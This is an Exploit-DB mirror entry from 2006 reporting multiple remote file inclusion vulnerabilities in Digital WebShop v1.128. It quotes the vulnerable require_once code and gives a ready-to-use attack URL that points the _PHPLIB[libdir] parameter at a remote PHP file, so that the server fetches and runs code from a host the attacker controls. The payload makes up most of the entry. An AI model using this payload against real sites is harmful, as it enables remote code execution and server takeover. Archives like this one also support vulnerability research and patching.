exploit-db-mirror/exploits/php/webapps/2398.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
756 B
Text

# Title : Digital WebShop = v1.128 Multiple Remote File Include Vulnerabilities
# Author : ajann
# Script Page : http://digitalwebshop.dyndns.org
# Exploit;
*******************************************************************************
[Files]
rechnung.php
prepend.php
[/Files]
[Code,1]
prepend.php Error:
// include Werzeuge
..
....
require_once($_PHPLIB["libdir"] . "phpDB-mysql.lib"); /*
Mysql Class*/
require_once($_PHPLIB["libdir"] . "messages_inc.php"); /*
Layout f?r Echos & Prints. */
....
..
Key [:] _PHPLIB[libdir]=http://target.com/command.php?
\Example:
http://target.com/rechnung.php?_PHPLIB[libdir]=http://target.com/command.php?
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-09-19]